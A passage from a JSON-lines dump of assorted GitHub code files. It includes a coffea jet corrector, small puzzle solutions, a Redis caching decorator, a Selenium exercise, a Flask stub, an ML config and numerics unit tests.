corrector.getCorrection(JetProperty1=jet.property1,...)\n\n \"\"\"\n first_kwarg = kwargs[list(kwargs.keys())[0]]\n if type(first_kwarg) is dask_awkward.Array:\n levels = \"/\".join(self._levels)\n func = _getCorrectionFn(self, **kwargs)\n zl_out = func(\n *tuple(\n awkward.Array(\n arg._meta.layout.form.length_zero_array(highlevel=False),\n behavior=arg.behavior,\n )\n for arg in kwargs.values()\n )\n )\n meta = awkward.Array(\n zl_out.layout.to_typetracer(forget_length=True),\n behavior=zl_out.behavior,\n )\n\n return dask_awkward.map_partitions(\n func,\n *tuple(kwargs.values()),\n label=f\"{self._campaign}-{self._dataera}-{self._datatype}-{levels}-{self._jettype}\",\n meta=meta,\n )\n else:\n corrs = self.getSubCorrections(**kwargs)\n return reduce(lambda x, y: y * x, corrs, 1.0)\n\n def getSubCorrections(self, **kwargs):\n \"\"\"\n Returns the set of corrections for all input jets broken down by level\n\n Use it like::\n\n jecs = corrector.getSubCorrections(JetProperty1=jet.property1,...)\n #'jecs' will be formatted like [[jec_jet1 jec_jet2 ...] ...]\n\n \"\"\"\n # cache = kwargs.pop(\"lazy_cache\", None)\n # form = kwargs.pop(\"form\", None)\n corrVars = {}\n if \"JetPt\" in kwargs.keys():\n corrVars[\"JetPt\"] = kwargs[\"JetPt\"]\n kwargs.pop(\"JetPt\")\n if \"JetE\" in kwargs.keys():\n corrVars[\"JetE\"] = kwargs[\"JetE\"]\n kwargs.pop(\"JetE\")\n if len(corrVars) == 0:\n raise Exception(\"No variable to correct, need JetPt or JetE in inputs!\")\n\n corrections = []\n for i, func in enumerate(self._funcs):\n sig = func.signature\n cumCorr = reduce(lambda x, y: y * x, corrections, 1.0)\n\n fargs = tuple(\n (cumCorr * corrVars[arg]) if arg in corrVars.keys() else kwargs[arg]\n for arg in sig\n )\n\n # lookup_base handles dask/awkward/numpy\n if isinstance(\n fargs[0], (dask_awkward.Array, awkward.highlevel.Array, numpy.ndarray)\n ):\n corrections.append(\n func(\n *fargs,\n dask_label=f\"{self._campaign}-{self._dataera}-{self._datatype}-{self._levels[i]}-{self._jettype}\",\n )\n )\n else:\n raise Exception(\"Unknown array library for inputs.\")\n\n return corrections\n","repo_name":"CoffeaTeam/coffea","sub_path":"src/coffea/jetmet_tools/FactorizedJetCorrector.py","file_name":"FactorizedJetCorrector.py","file_ext":"py","file_size_in_byte":7749,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"21"} +{"seq_id":"30195043353","text":"def prev_pos(x):\n if x == 'B':\n return 'J'\n elif x == 'O':\n return 'B'\n elif x == 'J':\n return 'O'\n\nn = int(input())\narr = list(input())\nMAX = 1000001\ndp = [MAX] * n # 1000**2 + 1 로 초기화\ndp[0] = 0\n\nfor i in range(1, n):\n prev = prev_pos(arr[i])\n\n for j in range(i):\n if arr[j] == prev:\n dp[i] = min(dp[i], dp[j] + (i-j)**2)\n\nprint(dp[n-1] if dp[n-1] != MAX else -1)\n\n# DP 문제\n# prev_pos 함수를 따로 빼는게 더 효율적","repo_name":"seokzin/algorithm-python","sub_path":"Code/Backjoon/12026-BOJ 거리.py","file_name":"12026-BOJ 거리.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70210707894","text":"def read_file(fp):\n with open(fp, 'r') as ifs:\n for line in ifs:\n text = line.strip()\n if text:\n yield text\n\n\ndef process(a):\n values = list(map(int, a))\n positions = {x: i for i, x in enumerate(values)}\n for i, x in enumerate(values):\n y = 2020 - x\n if positions.get(y, -1) > i:\n return x * y\n\n\nif __name__ == '__main__':\n a = read_file('input.txt')\n r = process(a)\n print(r)\n","repo_name":"m-tkach/adventofcode","sub_path":"2020/01/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24567990890","text":"# -*- coding: utf-8 -*-\nfrom functools import wraps\nimport hashlib\nimport logging\nimport json\nimport redis\n\n\nclass MyRedis(object):\n def __init__(self, host, port, password,db=0):\n self.pool = redis.ConnectionPool(host=host, password=password, port=port, db=db)\n self.rs = redis.Redis(connection_pool=self.pool, db=db)\n\n def get_redis(self):\n return self.rs\n\n\ndef redising(time=0, redis_key_prefix=\"_lever_utils\", db=None):\n '''\n redis 装饰器\n :param time: 保留时常\n # time==0,则不走缓存;\n # time>0,则走缓存,缓存时间为time;\n # time==-1,则走缓存,缓存时间为永久.\n # time==-2,则每次现查,并永久缓存覆盖现有缓存\n :param redis_key: redis key\n :return:\n '''\n def func_wrapper(func):\n @wraps(func)\n def return_wrapper(*args, **kwargs):\n if time == 0 or db is None:\n return func(*args, **kwargs), None\n func_info_str = \"model[%s]\\t func[%s]\\t file[%s][%s]\\t args[%s]\\t kwargs[%s]\" % (func.__module__\n , func.__name__\n , func.func_code.co_filename\n , func.func_code.co_firstlineno\n , args\n , kwargs)\n m2 = hashlib.md5()\n m2.update(func_info_str.encode('utf-8'))\n func_info_str_md5 = m2.hexdigest()\n func_info_str_md5_redis_key = redis_key_prefix+\"-\"+func_info_str_md5\n redis_store = db\n if time == -1 or time > 0:\n redis_result = redis_store.get(func_info_str_md5_redis_key)\n if redis_result is None:\n func_result = func(*args, **kwargs)\n redis_store.set(func_info_str_md5_redis_key, json.dumps(func_result), time if time > 0 else None)\n else:\n logging.info(\"to-redis:key[%s]\" % func_info_str_md5_redis_key)\n func_result = json.loads(redis_result)\n else:\n func_result = func(*args, **kwargs)\n redis_store.set(func_info_str_md5_redis_key, json.dumps(func_result))\n return func_result, func_info_str_md5_redis_key\n return return_wrapper\n return func_wrapper","repo_name":"0lever/utils","sub_path":"_lever_utils/foo/helpers/db/redis_helper.py","file_name":"redis_helper.py","file_ext":"py","file_size_in_byte":2617,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"30999261897","text":"import math\nimport time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\nbrowser = webdriver.Chrome()\nbrowser.get(\"http://suninjuly.github.io/redirect_accept.html\")\n\ntry:\n\n first_window = browser.window_handles[0]\n\n main_button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n main_button.click()\n\n second_window = browser.window_handles[1]\n\n browser.switch_to.window(second_window)\n\n def calc(text_value):\n return str(math.log(abs(12*math.sin(int(text_value)))))\n formula_text = browser.find_element(By.ID, \"input_value\")\n text_value = formula_text.text\n answer_value = calc(text_value)\n\n input_answer = browser.find_element(By.ID, \"answer\")\n input_answer.send_keys(answer_value)\n\n button = browser.find_element(By.CSS_SELECTOR, \"button.btn\")\n button.click()\n\nfinally:\n time.sleep(15)\n browser.quit()","repo_name":"MaximOkhri/autotest_course","sub_path":"new_window_script.py","file_name":"new_window_script.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28795737547","text":"\"\"\" Class implementation of BeatInfo \"\"\"\n\nclass BeatInfo(object):\n \n def __init__(self, tatums=2, beatDurationSec=.5, tatumProportions=None):\n \"\"\" Initialize module. \n Note: TatumProportions can be either a tuple of length of tatum division \n or None, which implies equal proportions \n \"\"\"\n self.setTatums(tatums)\n self.setBeatDurationSec(beatDurationSec)\n self.setTatumProportions(tatumProportions)\n\n def clone(self):\n \"\"\" Returns a deep copy\"\"\"\n return BeatInfo(self.getTatums(), self.getBeatDurationSec(), self.getTatumProportions())\n\n def hasEqualProportions(self):\n \"\"\" Initialize module \"\"\"\n return self.getTatumProportions() == None or self.getTatumProportions() == self.makeNTuple(self.getTatums())\n\n def rescale(self, factor, force=False, upscale=True):\n if not force and not self.hasEqualProportions():\n raise RuntimeError(\"Rescale not possible due to non-equal tatum proportions.\")\n tatums = self.getTatums()\n if upscale:\n self.setTatums(tatums*factor)\n else:\n if tatums % factor != 0:\n raise ValueError(\"Factor {} is no divisor of tatums {}\".format(factor, tatums))\n else:\n self.setTatums(tatums/factor) \n self.setTatumProportions(None) \n return self\n\n \n def setTatums(self, val):\n \"\"\" Set tatums. Does no(!) consistency check on tatum proportions!\"\"\"\n if int(val) > 0:\n self.__tatums = int(val)\n else:\n raise ValueError(\"Non-valid value for tatums {}\".format(val))\n \n return self\n \n def getTatums(self):\n \"\"\" Get tatums \"\"\"\n return self.__tatums\n \n def setBeatDurationSec(self, val):\n \"\"\" Set beat duration in seconds \"\"\"\n if val >= 0:\n self.__beatDurationSec = float(val)\n else:\n raise ValueError(\"Invalid value ({}) for beat duration!\".format(val))\n return self \n\n def getBeatDurationSec(self):\n \"\"\" Get beat duration in seconds \"\"\"\n return self.__beatDurationSec\n\n def setTatumProportions(self, val):\n \"\"\" Set tatum proportions. Must be consistent with tatum number\"\"\"\n if val == None:\n self.__tatumProportions = None \n elif isinstance(val, tuple):\n if len(val) == self.__tatums:\n self.__tatumProportions = val\n else:\n raise ValueError(\"Expected length {}, got {} \".format(self.__tatums, len(val)))\n else:\n raise ValueError(\"Expected tuple for tatum proportion.\")\n return self\n\n def getTatumProportions(self):\n \"\"\" Get tatum proportion \"\"\"\n return self.__tatumProportions\n \n def fractions(self, closeIt = True): \n \"\"\" Calculates tatum proportions represented as a list of points in the interval 0..1\"\"\"\n fractions = [0]\n if self.__tatumProportions == None:\n units = (self.__tatums)\n for i in range(1, self.__tatums): \n fractions.append(float(i)/units)\n else:\n units = sum(self.__tatumProportions) \n for i in range(1, len(self.__tatumProportions)): \n fractions.append(float(sum(self.__tatumProportions[0:i]))/units)\n if closeIt:\n fractions.append(1)\n return fractions\n\n def __eq__(self, bi):\n \"\"\" Compare two BeatInfo objects for equality \"\"\"\n if not isinstance(bi, BeatInfo):\n return False\n if self.getTatums() == bi.getTatums() and self.getBeatDurationSec() == bi.getBeatDurationSec() and self.getTatumProportions() == bi.getTatumProportions():\n return True\n return False\n\n def __ne__(self, bi):\n \"\"\" Compare two BeatInfo objects for inequality \"\"\"\n return not self.__eq__(bi) \n\n def makeNTuple(self, n, val = 1):\n t = ()\n for i in range(n):\n t = t + (val,) \n return t \n\n def toString(self, sep=\"|\"):\n if not isinstance(sep, str):\n sep = \"|\"\n return sep.join([str(self.getTatums()), str(self.getBeatDurationSec()), str(self.getTatumProportions())])\n\n def __str__(self): return self.toString()\n\n tatums = property(getTatums, setTatums)\n beatDurationSec = property(getBeatDurationSec, setBeatDurationSec)\n tatumProportion = property(getTatumProportions, setTatumProportions)\n","repo_name":"klausfrieler/melospy","sub_path":"melospy/basic_representations/beat_info.py","file_name":"beat_info.py","file_ext":"py","file_size_in_byte":4551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32348853548","text":"from flask import Flask\nfrom flask_restful import Api, Resource, reqparse\nfrom flask_cors import CORS\nimport random\nfrom flask_responses import json_response\n\napp=Flask(__name__)\napi= Api(app)\nCORS(app)\n\nresultlist = [\"Fake\",\"Real\"]\n\nclass User(Resource):\n def get(self):\n # randomly choosing real or fake and return with response status 200\n result = random.choice(resultlist)\n print(result)\n return json_response({\"result\":result}, status_code=200)\n \n def post(self, name):\n a = \"url added to db\"\n return a,200\n\napi.add_resource(User, \"/\")\nif __name__ == '__main__':\n app.run()","repo_name":"Poojavpatel/simple_api","sub_path":"simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38151127058","text":"name = input(\"Username : \")\nage = int(input('Age : '))\n\nprint(f\"Hello {name}!\")\n\ndef checkMail():\n email = input(\"Enter your email : \")\n print(f\"Pls check your email : {email}\")\n checkmail = input(\"Right? (y/n) : \")\n return checkmail\n\nif age >= 18: \n print('You are adult. You can save money in our bank')\n\n cond = True\n while(cond==True):\n a = checkMail()\n if a == 'y' or a == 'Y': \n cond = False\n elif a == 'n' or a == 'N':\n continue\n else: \n print(\"Wrong input, pls enter only 'y' or 'n'.\")\n checkMail()\n print(\"Congratulation....Well Done!\")\n\n\nelse: \n print(\"Sorry, you cann't save your money because you are too young\")\n\n\n\n","repo_name":"orochidasbala/GitTesting","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72754861814","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 6 22:48:41 2022\n\n@author: Ali\n\"\"\"\n\nimport argparse\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Interpretable CNN')\n\ndef str2bool(v):\n if isinstance(v, bool):\n return v\n if v.lower() in ('yes', 'true', 't', 'y', '1'):\n return True\n elif v.lower() in ('no', 'false', 'f', 'n', '0'):\n return False\n else:\n raise argparse.ArgumentTypeError('Boolean value expected.')\n\n#choose wheter to train a CF model for a given base model or train a base model from scratch\n#parser.add_argument('--create_counterfactual_combined' ,default = True,type=str2bool)## create CF model for a pretrained base model or train a new base model\nparser.add_argument('--filter_visualization' ,default = True,type=str2bool) # find top k highest and lowest activation magnitudes for the target filter and the corresponding images\n\nparser.add_argument('--user_evaluation' ,default = False,type=str2bool) # save images\n\n# CF model args\nparser.add_argument('--train_counterfactual_net' ,default = True, type=str2bool)## \nparser.add_argument('--train_all_classes' ,default = True, type=str2bool)## \nparser.add_argument('--dropout' ,default = False, type=str2bool)## dont use... not good results\n\nparser.add_argument('--train_singular_counterfactual_net' ,default = False, type=str2bool)## \nparser.add_argument('--choose_subclass' ,default = False, type=str2bool)## choose subclass for training on\n\nparser.add_argument('--counterfactual_PP' ,default = False, type=str2bool)## whether to generate filters for PP or PN case \nparser.add_argument('--resume_counterfactual_net' ,default = True, type=str2bool)## False = train CF model from scratch; True = resume training CF model\nparser.add_argument('--resume_from_epoch' ,default = 30, type=np.int32)## False = train CF model from scratch; True = resume training CF model\nparser.add_argument('--test_counterfactual_net' ,default = False, type=str2bool)## \nparser.add_argument('--load_counterfactual_net',default = True, type=str2bool)\nparser.add_argument('--resume', default =True, type=str2bool) # load saved weights for base model\nparser.add_argument('--alter_class', default = 0, type = np.int32) # alter class #misclassified classes 9-170\nparser.add_argument('--analysis_class', default = 6, type = np.int32) # class for which images are loaded and analyzed\nparser.add_argument('--find_global_filters', default = False, type=str2bool) # perform statistical analysis to find the activation magnitude of all filters for the alter class and train images of alter class\n#parser.add_argument('--alter_class_2', default = 0, type = np.int32) # alter class for 2nd example, 9, 170, 25, 125, 108\nparser.add_argument('--cfe_epochs', default = 60, type = np.int32 ) #100 for mnist, 200 for CUB\nparser.add_argument('--l1_weight', default = 2, type = np.float32) # 2 default\nparser.add_argument('--save_logFile', default = True, type=str2bool) #\n\n#parser.add_argument('--pretrained', default = False) # load self-pretrained model for cifar dataset... i.e. load base model already trained on cifar-10\n\n# common args\nparser.add_argument('--augmentation' ,default = True, type=str2bool)## \n\n#base model parameters\nparser.add_argument('--dataset',default = 'fmnist')#NIST, BraTS,mnist, cifar10, CUB200, #cxr1000, #catsvsdogs, #VOC2010, #fmnist\nparser.add_argument('--save_directory',default = './trained_weights/')\nparser.add_argument('--train_using_builtin_fit_method',default = True)#for training base model easily\nparser.add_argument('--train',default = False)\nparser.add_argument('--fine_tune',default = False) # fine tune all weights after transfer learning step (CUB dataset)\nparser.add_argument('--test', default = True)\nparser.add_argument('--model',default = 'customCNN/')#customCNN, VGG16, resnet50,efficientnet, inceptionv3\nparser.add_argument('--imagenet_weights',default = False) #use imageNet pretrained weights (True for CUB dataset)\n\nKAGGLE = False\n\nif KAGGLE: \n args = parser.parse_known_args()[0]\n args.save_directory = \"/kaggle/working/trained_weights/\" \n kaggle_load_dir = \"/kaggle/input/train-cfe-model-kaggle/trained_weights/\"\nelse: \n args = parser.parse_args()\n\nif (args.train_counterfactual_net and args.train_all_classes):\n dropout = \"\"\n if args.dropout:\n dropout = \"dropout\"\n weights_path = args.save_directory+args.model+args.dataset+'/all_clases/'+dropout+'/epochs_'+str(args.cfe_epochs)\n if KAGGLE:\n resume_path = kaggle_load_dir+args.model+args.dataset+'/all_clases/'+dropout+'/epochs_'+str(args.resume_from_epoch)\n else:\n resume_path = args.save_directory+args.model+args.dataset+'/all_clases/'+dropout+'/epochs_'+str(args.resume_from_epoch)\n pretrained_weights_path = args.save_directory+args.model+args.dataset+'/standard'\nelse:\n weights_path = args.save_directory+args.model+args.dataset+'/standard'\n pretrained_weights_path = weights_path\n resume_path = args.save_directory+args.model+args.dataset+'/standard/epochs_'+str(args.resume_from_epoch)\n","repo_name":"alitariq-syed/Counterfactual-Explanation-Model","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71125574452","text":"\nfrom versions import scipy_available\n\n\ndef test_import():\n import numerics\n from numerics import curve_fit\n from numerics import morse,morse_re,morse_a,morse_De,morse_Einf,morse_width\n from numerics import morse_depth,morse_Ee,morse_k,morse_params\n from numerics import morse_reduced_mass,morse_freq,morse_w,morse_wX\n from numerics import morse_En,morse_zero_point,morse_harmfreq\n from numerics import morse_harmonic_potential,morse_spect_fit\n from numerics import morse_rDw_fit,morse_fit,morse_fit_fine\n from numerics import murnaghan,birch,vinet\n from numerics import murnaghan_pressure,birch_pressure,vinet_pressure\n from numerics import eos_param,eos_eval,eos_fit,eos_Einf,eos_V,eos_B,eos_Bp\n from numerics import jackknife,jackknife_aux,check_jackknife_inputs\n from numerics import ndgrid\n from numerics import simstats,simplestats,equilibration_length,ttest\n from numerics import surface_normals,simple_surface\n from numerics import func_fit\n from numerics import distance_table,nearest_neighbors,voronoi_neighbors\n from numerics import convex_hull\n\n#end def test_import\n\n\n\ndef test_ndgrid():\n import numpy as np\n from testing import value_eq\n from numerics import ndgrid\n\n x = [0,1,2.]\n y = [3,4.,5,6]\n z = [7,8,9,10,11.]\n\n points = np.zeros((3,len(x)*len(y)*len(z)),dtype=float)\n n = 0\n for xv in x:\n for yv in y:\n for zv in z:\n points[:,n] = xv,yv,zv\n n += 1\n #end for\n #end for\n #end for\n points = np.array(points)\n points.shape = 3,len(x),len(y),len(z)\n points = points\n\n grid = ndgrid(x,y,z)\n\n assert(value_eq(grid,points))\n#end def test_ndgrid\n\n\n\ndef test_distance_table():\n import numpy as np\n from testing import value_eq\n from numerics import distance_table\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [0,0,1],\n [1,1,0],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n d0 = 0.0\n d1 = 1.0\n d2 = np.sqrt(2.)\n d3 = np.sqrt(3.)\n\n dtable = [[d0,d1,d1,d1,d2,d2,d2,d3],\n [d1,d0,d2,d2,d1,d1,d3,d2],\n [d1,d2,d0,d2,d1,d3,d1,d2],\n [d1,d2,d2,d0,d3,d1,d1,d2],\n [d2,d1,d1,d3,d0,d2,d2,d1],\n [d2,d1,d3,d1,d2,d0,d2,d1],\n [d2,d3,d1,d1,d2,d2,d0,d1],\n [d3,d2,d2,d2,d1,d1,d1,d0]]\n dtable = np.array(dtable,dtype=float)\n dt = distance_table(points,points)\n assert(value_eq(dt,dtable))\n\n dtable = [[d0,d1,d1,d1],\n [d1,d0,d2,d2],\n [d1,d2,d0,d2],\n [d1,d2,d2,d0],\n [d2,d1,d1,d3],\n [d2,d1,d3,d1],\n [d2,d3,d1,d1],\n [d3,d2,d2,d2]]\n dtable = np.array(dtable,dtype=float)\n dt = distance_table(points,points[0:4])\n assert(value_eq(dt,dtable))\n\n points = [\n [0,0,0],\n [1,1,0],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n dtable = [[d0,d2,d3],\n [d0,d1,d2],\n [d0,d1,d3]]\n dtable = np.array(dtable,dtype=float)\n dtable_order = [[0,1,2],\n [1,2,0],\n [2,1,0]]\n dtable_order = np.array(dtable_order,dtype=int)\n dt,order = distance_table(points,points,ordering=1)\n assert(value_eq(dt,dtable))\n assert(value_eq(order,dtable_order))\n\n dtable = [[d0,d2,d3],\n [d0,d1,d2],\n [d0,d1,d3]]\n dtable = np.array(dtable,dtype=float)\n dtable_order = [[0,1,2],\n [1,2,0],\n [2,1,0]]\n dtable_order = np.array(dtable_order,dtype=int)\n dt,order = distance_table(points,points,ordering=2)\n assert(value_eq(dt,dtable))\n assert(value_eq(order,dtable_order))\n\n#end def test_distance_table\n \n\n\ndef test_nearest_neighbors():\n import numpy as np\n from testing import value_eq\n from numerics import nearest_neighbors\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [1,1,0],\n [0,0,1],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n plow = points[:4]\n phigh = points[4:]\n\n d0 = 0.0\n d1 = 1.0\n d2 = np.sqrt(2.)\n d3 = np.sqrt(3.)\n\n nn_ref = [[0,1,2],\n [1,0,3],\n [2,0,3],\n [3,1,2]]\n nn_ref = np.array(nn_ref,dtype=int)\n\n dist_ref = [[d1,d2,d2],\n [d1,d2,d2],\n [d1,d2,d2],\n [d1,d2,d2]]\n dist_ref = np.array(dist_ref,dtype=float)\n\n def check_nn(nn):\n for n,nr in zip(nn,nn_ref):\n assert(n[0]==nr[0])\n assert(set(n[1:])==set(nr[1:]))\n #end for\n #end def check_nn\n\n nn = nearest_neighbors(3,plow,phigh,slow=True)\n check_nn(nn)\n\n nn,dist = nearest_neighbors(3,plow,phigh,return_distances=True,slow=True)\n check_nn(nn)\n assert(value_eq(dist,dist_ref))\n\n if scipy_available:\n nn = nearest_neighbors(3,plow,phigh)\n check_nn(nn)\n\n nn,dist = nearest_neighbors(3,plow,phigh,return_distances=True)\n check_nn(nn)\n assert(value_eq(dist,dist_ref))\n #end if\n\n#end def test_nearest_neighbors\n\n\n\nif scipy_available:\n def test_voronoi_neighbors():\n import numpy as np\n from testing import value_eq\n from numerics import voronoi_neighbors\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [1,1,0],\n [0,0,1],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)\n\n joggle = np.array(\n [[0.60801892, 0.68024807, 0.09037058],\n [0.95800898, 0.43112463, 0.52981569],\n [0.08862067, 0.69084511, 0.35177345],\n [0.37363091, 0.57409599, 0.95654043],\n [0.8310818 , 0.17146777, 0.90490215],\n [0.17600223, 0.89772462, 0.75582196],\n [0.7408217 , 0.22768522, 0.64564984],\n [0.71678216, 0.6409734 , 0.53354209]])\n joggle *= 1e-8\n\n points += joggle\n\n nn_pairs_ref = [[0,1],\n [0,2],\n [0,4],\n [0,3],\n [0,6],\n [0,5],\n [7,3],\n [7,5],\n [7,6],\n [3,1],\n [3,2],\n [3,6],\n [3,5],\n [1,5],\n [5,4],\n [5,6],\n [6,4],\n [6,2]]\n nn_pairs_ref = np.array(nn_pairs_ref,dtype=int)\n\n d1 = 1.0\n d2 = float(np.sqrt(2.))\n\n nn_pairs = voronoi_neighbors(points)\n\n dist_ref = 3*[d1]+3*[d2]+5*[d1]+2*[d2]+2*[d1]+[d2]+2*[d1]\n\n assert(isinstance(nn_pairs,np.ndarray))\n nn_pairs = np.array(nn_pairs,dtype=int)\n assert(value_eq(nn_pairs,nn_pairs_ref))\n\n for n,(i,j) in enumerate(nn_pairs):\n d = np.linalg.norm(points[i]-points[j])\n assert(value_eq(float(d),dist_ref[n]))\n #end for\n\n #end def test_voronoi_neighbors\n\n\n\n def test_convex_hull():\n import numpy as np\n from testing import value_eq\n from numerics import convex_hull\n\n points = [\n [0,0,0],\n [1,0,0],\n [0,1,0],\n [1,1,0],\n [0,0,1],\n [1,0,1],\n [0,1,1],\n [1,1,1],\n ]\n points = np.array(points,dtype=float)-0.5\n \n points = np.append(2*points,points,axis=0)\n\n hull = convex_hull(points)\n\n assert(hull==list(range(8)))\n #end def test_convex_hull\n#end if\n\n\n\nimport numpy as np\ndef random_stream(n):\n\n def rng(m=2**32, a=1103515245, c=12345):\n rng.current = (a*rng.current + c) % m\n return float(rng.current)/m\n #end def rng\n\n rng.current = 1\n\n return np.array([rng() for i in range(n)],dtype=float)\n#end def random_stream\n\n\nrstream = random_stream(1000)\nrstream_wide = np.array(10*[rstream])\n\n\n\ndef test_simplestats():\n import numpy as np\n from testing import value_eq\n from numerics import simplestats\n\n m,e = simplestats(rstream)\n\n m_ref = 0.507154277182\n e_ref = 0.00916655521114\n\n assert(value_eq(float(m),m_ref))\n assert(value_eq(float(e),e_ref))\n\n m_ref = np.array(10*[m_ref])\n e_ref = np.array(10*[e_ref])\n\n m,e = simplestats(rstream_wide)\n\n assert(value_eq(m,m_ref))\n assert(value_eq(e,e_ref))\n#end def test_simplestats\n\n\n\ndef test_simstats():\n import numpy as np\n from testing import value_eq\n from numerics import simstats\n\n m,v,e,k = simstats(rstream)\n\n m_ref = 0.507154277182\n v_ref = 0.0840257344388\n e_ref = 0.00949486225214\n k_ref = 1.07291426596\n\n assert(value_eq(float(m),m_ref))\n assert(value_eq(float(v),v_ref))\n assert(value_eq(float(e),e_ref))\n assert(value_eq(float(k),k_ref))\n\n m_ref = np.array(10*[m_ref])\n v_ref = np.array(10*[v_ref])\n e_ref = np.array(10*[e_ref])\n k_ref = np.array(10*[k_ref])\n \n m,v,e,k = simstats(rstream_wide)\n \n assert(value_eq(m,m_ref))\n assert(value_eq(v,v_ref))\n assert(value_eq(e,e_ref))\n assert(value_eq(k,k_ref))\n#end def test_simstats\n\n\n\ndef test_equilibration_length():\n import numpy as np\n from numerics import equilibration_length\n\n eq = equilibration_length(rstream,random=False)\n assert(eq==0)\n\n rs = rstream + np.exp(-np.arange(len(rstream),dtype=float)/10)\n\n eq = equilibration_length(rs,random=False)\n assert(eq==52)\n\n eq = equilibration_length(rs,random=True)\n#end def test_equilibration_length\n\n\n\nif scipy_available:\n def test_ttest():\n import numpy as np\n from testing import value_eq\n from numerics import ttest\n\n p = ttest(0.,1.,100,0.,1.,100)\n assert(value_eq(float(p),1.0))\n\n p = ttest(0.,1.,10000,1.,1.,10000)\n assert(value_eq(float(p),0.479508361523))\n #end def test_ttest\n#end if\n\n\n\ndef test_jackknife():\n from testing import value_eq\n from numerics import jackknife\n\n def value(v):\n return v\n #end def value\n\n jm_ref = np.array(10*[0.50715428],dtype=float)\n je_ref = np.array(10*[0.00917114],dtype=float)\n\n jm,je = jackknife(rstream_wide.T,value)\n\n assert(value_eq(jm,jm_ref))\n assert(value_eq(je,je_ref))\n#end def test_jackknife\n\n\n\ndef test_morse():\n from testing import value_eq\n from unit_converter import convert\n from numerics import morse,morse_re,morse_a,morse_De,morse_Einf,morse_width\n from numerics import morse_depth,morse_Ee,morse_k,morse_params\n from numerics import morse_reduced_mass,morse_freq,morse_w,morse_wX\n from numerics import morse_E0,morse_En,morse_zero_point,morse_harmfreq\n from numerics import morse_harmonic_potential,morse_spect_fit\n from numerics import morse_rDw_fit,morse_fit,morse_fit_fine\n\n rm = morse_reduced_mass('Ti','O')\n assert(value_eq(rm,21862.2266134))\n\n r_ref,D_ref,w_ref = 1.620,6.87,1009.18\n r_ref_A = r_ref\n p = morse_rDw_fit(r_ref,D_ref,w_ref,'Ti','O',Dunit='eV')\n\n r_ref = convert(r_ref,'A','B')\n D_ref = convert(D_ref,'eV','Ha')\n\n r = morse_re(p)\n D = morse_De(p)\n w = morse_w(p,'Ti','O')\n Einf = morse_Einf(p)\n assert(value_eq(float(r),r_ref))\n assert(value_eq(float(D),D_ref))\n assert(value_eq(float(w),w_ref))\n assert(value_eq(float(Einf),0.0))\n\n width_ref = 1.0451690611\n width = morse_width(p)\n assert(value_eq(float(width),width_ref))\n\n depth = morse_depth(p)\n assert(value_eq(depth,D_ref))\n\n a = morse_a(p)\n assert(value_eq(float(a),1/width_ref))\n\n Ee = morse_Ee(p)\n assert(value_eq(float(Ee),-D_ref))\n\n k_ref = 0.462235185922\n k = morse_k(p)\n assert(value_eq(float(k),k_ref))\n\n assert(value_eq(morse_params(r,a,D,Einf),p))\n\n assert(value_eq(morse_freq(p,'Ti','O'),w))\n\n #wX_ref = 2.43157675597e-08 # might be buggy\n #wX = morse_wX(p,'Ti','O')\n #assert(value_eq(float(wX),wX_ref))\n\n E0_ref = -0.250174011529\n E0 = morse_E0(p,'Ti','O')\n assert(value_eq(float(E0),E0_ref))\n\n E0 = morse_En(p,0,'Ti','O')\n assert(value_eq(float(E0),E0_ref))\n\n En_ref = [-0.250174011529,\n -0.245617721989,\n -0.241103305298,\n -0.236630761457,\n -0.232200090465]\n\n for n in range(5):\n En = morse_En(p,n,'Ti','O')\n assert(value_eq(float(En),En_ref[n]))\n #end for\n\n zp_ref = 0.00229384708885\n zp = morse_zero_point(p,'Ti','O')\n assert(value_eq(float(zp),zp_ref))\n\n # not consistent w/ morse_wX\n #p_sf = morse_spect_fit(r_ref_A,w_ref,wX_ref,'Ti','O')\n\n hf_ref = 0.00459816239012\n hf = morse_harmfreq(p,'Ti','O')\n assert(value_eq(float(hf),hf_ref))\n\n E = morse(p,r_ref)\n assert(value_eq(float(E),-D_ref))\n#end def test_morse\n\n\n\nif scipy_available:\n def test_morse_fit():\n import numpy as np\n from testing import value_eq\n from unit_converter import convert\n from numerics import morse\n from numerics import morse_rDw_fit,morse_fit,morse_fit_fine\n\n r_ref,D_ref,w_ref = 1.620,6.87,1009.18\n r_ref_A = r_ref\n p = morse_rDw_fit(r_ref,D_ref,w_ref,'Ti','O',Dunit='eV')\n\n r_ref = convert(r_ref,'A','B')\n\n\n rfine = np.linspace(0.8*r_ref,1.2*r_ref,100)\n Efine = 